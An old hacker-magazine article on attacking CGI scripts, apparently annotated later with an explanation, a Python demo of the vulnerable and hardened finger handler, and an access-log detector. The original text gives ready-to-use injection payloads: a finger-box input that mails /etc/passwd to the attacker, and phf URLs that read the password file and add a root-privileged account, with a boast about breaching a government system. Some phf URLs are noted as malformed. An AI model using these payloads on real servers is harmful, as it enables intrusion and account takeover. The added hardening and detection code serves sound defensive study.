_________SWAT MAGAZINE ISSUE TWENTY FIVE JANUARY 2000 __________
/ \___________________________________________/ \
/         Site Busting: CGI Exploits part II        \
/              by -=The Firestarter=-               \
-----------------------------------------------------------------------

Oh well, I guess it's time for me to share some more of my CGI hacker knowledge with you. This month we'll be concentrating on the finger box.

Just like the finger daemon that runs on port 79 of some *nix systems, a finger CGI returns information on users of the system, and that information in itself can be invaluable when it comes to an attack on the system. So if we fire up Netscape and head over to:

Http://ww.victim-server.org/cgi-bin/finger

and we get a simple page with a box and a submit button, then we have struck gold!

If you simply enter a name like "fred" into the box then you will probably get one or two entries back, giving you the usual sorts of information from a normal finger query. Once you've got a few e-mail addresses from the query (make a note of them now!) it's time to attempt an attack to swipe the /etc/passwd file. Enter:

emailfromserver@victim-server.org ; /bin/mail me@me.co.uk < /etc/passwd

into the box and whack the submit button! Obviously emailfromserver@victim-server.org is the e-mail address you got from the server and me@me.co.uk is your e-mail address. Now, _if_ that works, you will receive the /etc/passwd file in your mailbox.

Why it works: the script behind the box doesn't run finger itself, it builds a command line like "finger <whatever you typed>" and hands it to /bin/sh. The shell treats ";" as the end of the finger command and runs whatever follows it as a second command, under the user the web server runs as (usually nobody). That also tells you the limits: you only get files that user can read, and on a system with shadow passwords the /etc/passwd you get back has no hashes in it, so you're after account names rather than something to crack. Use the full path /etc/passwd; a relative one only works if the CGI happens to run with / as its working directory.

Just a little note though: you will be very lucky if this actually works, but just like the old phf exploit, it will never die!
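As an added example (this is not the article's code; the original finger CGIs were Perl or C scripts, and this models the same mistake in Python with function names of my own), here is the splice-the-box-into-a-shell bug beside its hardened form. ATTACK_NAME is the article's payload; DEMO_NAME has the same shape but uses echo instead of /bin/mail so the demonstration can run on any box without mailing anything.

```python
import re
import subprocess

# Constructed sample values, exactly as a browser would submit them from the
# finger page's text box (these are mine, not taken from a real server).
BENIGN_NAME = "fred"
# The article's payload, with the full path to /etc/passwd.
ATTACK_NAME = "fred@victim-server.org ; /bin/mail me@me.co.uk < /etc/passwd"
# Harmless stand-in with the same shape, so the demonstration runs anywhere
# without mailing anything: the text after ';' is a second shell command.
DEMO_NAME = "fred ; echo INJECTED"


def vulnerable_command(name):
    """What a typical 1990s finger CGI did: splice the form value straight into
    a command line that is then handed to /bin/sh (system(), backticks, popen).
    The shell, not finger, sees the ';' and runs whatever follows it."""
    return "finger " + name


def run_vulnerable(name):
    """Run the spliced command through /bin/sh and return its stdout.  Whether
    or not finger is installed, anything after ';' still executes as the web
    server's user (usually 'nobody'), so only files that user can read leak."""
    proc = subprocess.run(vulnerable_command(name), shell=True,
                          capture_output=True, text=True)
    return proc.stdout


# Hardened form: an allow-list for what a login name may look like.  No shell
# metacharacters, no whitespace, no leading '-' (so the value cannot become a
# finger option), and a sane length.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,31}")


def safe_argv(name):
    """Build the argument vector for a hardened handler.  The value is checked
    against SAFE_NAME and passed to finger as one argv element; no shell ever
    parses it, so ';', '|', '<' and friends have no meaning."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("rejected finger target: %r" % (name,))
    return ["finger", name]


def rejects(name):
    """True if the hardened handler would refuse this form value."""
    try:
        safe_argv(name)
    except ValueError:
        return True
    return False


def run_safe(name):
    """Execute the hardened form (list argv, shell=False).  Returns stdout, or
    None if finger is not installed on this host."""
    try:
        proc = subprocess.run(safe_argv(name), capture_output=True, text=True)
    except FileNotFoundError:
        return None
    return proc.stdout


if __name__ == "__main__":
    print("vulnerable command line:", vulnerable_command(ATTACK_NAME))
    print("vulnerable output for DEMO_NAME:", run_vulnerable(DEMO_NAME).strip())
    print("hardened argv for BENIGN_NAME:", safe_argv(BENIGN_NAME))
    print("hardened handler rejects ATTACK_NAME:", rejects(ATTACK_NAME))
```

The point of the hardened version is not the regex on its own but the combination: an allow-list on the input plus an argv list with shell=False, so even a value that slips past the pattern is never interpreted by a shell. Escaping metacharacters one by one (which is what phf tried) is the approach that keeps missing one.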
Now, speaking of the old phf exploit: if you do ever find a system with that installed (yeah, I know they are very rare, but I found an Australian government system with it on the other day :) then instead of passing:

http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

to steal the passwd file, try passing these commands (in this order):

http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20swateam%20swateam%20100%20
http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20swateam%0
http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500

Now telnet to it and hey presto, user swateam has root privs! Yeah, basic I know, but it still works on a few select systems.

The trick is the same one as the finger box: phf escaped the usual shell metacharacters in Qalias but forgot the newline, so %0a ends the command phf meant to run and whatever comes after it goes to the shell. Two things to keep in mind before you get your hopes up. First, phf runs as the web server's user, so adding an account or changing a uid only works on the rare box where httpd runs as root. Second, the three URLs are reproduced exactly as printed in the source: the trailing "%0" in the second one is a truncated escape (a valid one is "%" plus two hex digits), "%500" in the third decodes to the letter P followed by 0 (so the shell sees "rootP0"), and "chuid" is not a standard Unix binary, so expect to adapt them to whatever the target actually has.

< user via phf from: Reality Check Network issue 33 >
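From the other side of the fence: the phf requests above, plus a form POST to the finger box, as they would land in a web server's access log, with a small detector that percent-decodes the query string and flags requests to shell-backed CGIs that carry a newline or other shell metacharacter. This is an added example, not code from the article or from Reality Check Network; the log lines are constructed, and the function names and the list of CGI paths are mine.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines (mine, not from any real server).  The
# first three request lines are the phf URLs quoted in the article; the last
# is a form POST to the finger CGI, whose payload never reaches the log.
LOG_LINES = """\
10.0.0.7 - - [11/Jan/2000:03:14:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1287
10.0.0.7 - - [11/Jan/2000:03:14:22 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/adduser%20swateam%20swateam%20100%20 HTTP/1.0" 200 512
10.0.0.7 - - [11/Jan/2000:03:14:39 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/chuid%20swateam%0 HTTP/1.0" 200 498
192.0.2.44 - - [11/Jan/2000:08:02:15 +0000] "GET /cgi-bin/phf?Qalias=bob HTTP/1.0" 200 330
192.0.2.44 - - [11/Jan/2000:08:03:01 +0000] "GET /index.html HTTP/1.0" 200 2048
10.0.0.7 - - [11/Jan/2000:03:20:41 +0000] "POST /cgi-bin/finger HTTP/1.0" 200 410
"""

# A CLF entry: client, ident, user, [timestamp], "METHOD TARGET VERSION", status, size.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# CGI programs known to hand user input to a shell (assumed list, extend it).
SHELL_CGIS = ("/cgi-bin/phf", "/cgi-bin/finger")

# Characters that change the meaning of a shell command line.  Newline is the
# one phf's escaping missed; the rest catch finger-box style payloads.
SHELL_META = re.compile(r"[\n;|&`$<>]")


def decode_query(target):
    """Split a request target into path and percent-decoded query string.
    Malformed escapes such as a bare '%0' are left as-is by unquote()."""
    path, _, query = target.partition("?")
    return path, unquote(query)


def classify(target):
    """Return the decoded query if this request is a shell-metacharacter attack
    against one of SHELL_CGIS, else None."""
    path, query = decode_query(target)
    if path not in SHELL_CGIS:
        return None
    if not SHELL_META.search(query):
        return None
    return query


def injected_command(decoded_query):
    """For a phf-style payload the attacker's command is whatever follows the
    first newline.  Returns '' if there is none."""
    _, _, cmd = decoded_query.partition("\n")
    return cmd.strip()


def scan_log(text):
    """Return one dict per suspicious request, in log order."""
    hits = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        query = classify(m.group("target"))
        if query is None:
            continue
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "path": decode_query(m.group("target"))[0],
            "decoded": query,
            "command": injected_command(query),
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["ts"], hit["ip"], hit["path"], repr(hit["command"]))
```

Note what the last log line shows: the finger box is submitted as a form POST, so the access log only records "POST /cgi-bin/finger" and the payload is gone. The phf attack is visible because phf takes its input in the query string. If you need to see what went into a POSTed box, you have to log it in the CGI itself or in front of it.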